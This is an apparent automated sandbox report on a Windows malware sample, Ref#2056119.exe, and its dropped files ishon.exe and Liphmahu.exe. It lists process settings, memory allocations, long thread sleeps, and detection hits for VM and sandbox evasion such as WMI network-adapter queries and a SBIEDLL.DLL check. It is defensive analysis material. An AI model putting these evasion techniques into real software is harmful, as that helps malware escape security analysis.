Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ishon.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Ref#2056119.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ishon.exe PID: 7236, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Ref#2056119.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\ishon.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Ref#2056119.exe	Memory allocated: 12F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Memory allocated: 2E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Memory allocated: 2C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Memory allocated: 910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Memory allocated: 24A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Memory allocated: 44A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Memory allocated: 1290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Memory allocated: 4DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	Memory allocated: 1790000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ishon.exe	Memory allocated: 30D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ishon.exe	Memory allocated: 50D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Memory allocated: 1380000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Memory allocated: 2C20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Memory allocated: 4C20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ishon.exe	Memory allocated: 13B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ishon.exe	Memory allocated: 2F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ishon.exe	Memory allocated: 2CF0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\Ref#2056119.exe	Window / User API: threadDelayed 7374	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Window / User API: threadDelayed 1923	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Window / User API: threadDelayed 3372	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Window / User API: threadDelayed 1650	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Window / User API: threadDelayed 1358	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Window / User API: threadDelayed 4720	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	Window / User API: threadDelayed 2196
Source: C:\Users\user\AppData\Roaming\ishon.exe	Window / User API: threadDelayed 4986
Source: C:\Users\user\AppData\Roaming\ishon.exe	Window / User API: threadDelayed 5721
Source: C:\Users\user\AppData\Roaming\ishon.exe	Window / User API: threadDelayed 1653

Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7560	Thread sleep count: 7374 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7560	Thread sleep count: 1923 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -99764s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -99655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -99546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -99218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -98999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -98670s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -98543s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -98421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -98312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -98179s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -97998s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -97796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -97687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -97575s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -97343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -97234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -97124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -97015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -96901s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -96781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -96671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -96562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -96453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -96343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -96230s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -96109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -95999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -95888s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -95765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -95656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -95546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -95435s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -95324s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -95194s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -95078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -94956s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 7528	Thread sleep time: -94830s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -99854s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7908	Thread sleep count: 3372 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7908	Thread sleep count: 1650 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -99704s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -99578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -99452s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -99330s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -99055s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -98860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -98735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -98534s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -98407s >= -30000s	Jump to behavior
